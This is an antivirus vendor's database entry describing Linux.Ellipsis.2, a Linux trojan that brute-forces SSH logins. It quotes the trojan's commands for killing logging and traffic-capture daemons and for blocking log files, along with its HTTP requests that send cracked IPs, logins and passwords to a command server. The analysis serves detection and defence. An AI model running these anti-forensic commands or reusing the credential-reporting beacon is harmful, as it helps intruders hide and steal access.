Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

Linux.Ellipsis.2

Added to the Dr.Web virus database: 2015-09-10

Virus description added:

SHA1:

  • c93957405ed43d8cca936dcf9a894a82fa10a518 (unpacked)
  • 8b34e16d1542766d7c09472dfa23a69a0e1c13ce (UPX)

A Trojan for Linux designed for brute-forcing accounts in order to get access to an attacked system using the SSH protocol. Once launched, it takes one incoming argument:

auto:zzz.ccc.vvv.bbb

где zzz.ccc.vvv.bbb (command and control server IP)

Once launched, the Trojan removes its own working directory ("/tmp/.../") and clears the list of iptables rules. Then it “kills” processes of a number of running applications—for example, of programs used to log events and analyze traffic:

killall syslogd rsyslogd syslog syslog-ng named dnscache dnsmasq tcpdump
killall -9 syslogd rsyslogd syslog syslog-ng named dnscache dnsmasq tcpdump
kill -9 `pidof syslogd rsyslogd syslog syslog-ng named dnscache dnsmasq tcpdump`

Using the "/var/log/*" and "/disk/*log*" masks, the Trojan replaces existing directories and system log files with folders under the same names—this makes creation of logs with identical names in future impossible:

mkdir /var/log/all.log /var/log/auth.log /var/log/messages /var/log/secure /var/log/everything.log /var/log/messages.log /disk/all.log /disk/auth.log /disk/messages /disk/secure /disk/everything.log /disk/messages.log

Then the Trojan extracts from /proc/cpuinfo the processor frequency value specified in the "bogomips" parameter. Based on this value, the malicious program calculates the total number of scanning threads and SSH connections.

After that, the Trojan refers for tasks to the server whose address it gets as an incoming argument on startup. A task obtained from the server contains an IP address of a subnet that the malicious program scans for devices with open SSH connections on port 22. If such devices are detected, the Trojan tries to connect to them by going through all login:password pairs from a special list. If such an attempt is successful, the Trojan sends an appropriate message to the server controlled by cybercriminals.

GET /auto.cgi?root=yes&ip=%s&l=%s&p=%s HTTP/1.0\nUser-Agent:
Mozilla\nAccept-Language: en\nHost: auto\nCopyright: 2005 by RS from
Romania Hello World Microsoft Sucks Bill Gates Must die\n\n

where ip indicates the IP address of the node to which the connection is established, l indicates the login, and p indicates the password.

Using a separate thread, the malware sends the following request to the command and control server with a one-minute interval:

GET
/auto.cgi?report=yes&finish=%d&net=%s&seconds=%d&open=%d&rootcount=%d&s
shspeed=%d&totalssh=%d&ssherrors=%d&totalscan=%d&scanmax=%d&sshmax=%d
HTTP/1.0\nUser-Agent: Mozilla\nAccept-Language: en\nHost:
auto\nCopyright: 2005 by RS from Romania Hello World Microsoft Sucks
Bill Gates Must die\n\n

At that, the “finish” value equals zero. Once scanning is over, the Trojan sends 10 similar requests containing the “finish” value of 1 with a 1-second interval.

The net parameter contains the IP address of the subnet currently scanned by the Trojan.

Recommandations pour le traitement


Linux

Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

Version démo gratuite

Pour 1 mois (sans enregistrement) ou 3 mois (avec enregistrement et remise pour le renouvellement)

Télécharger Dr.Web

Par le numéro de série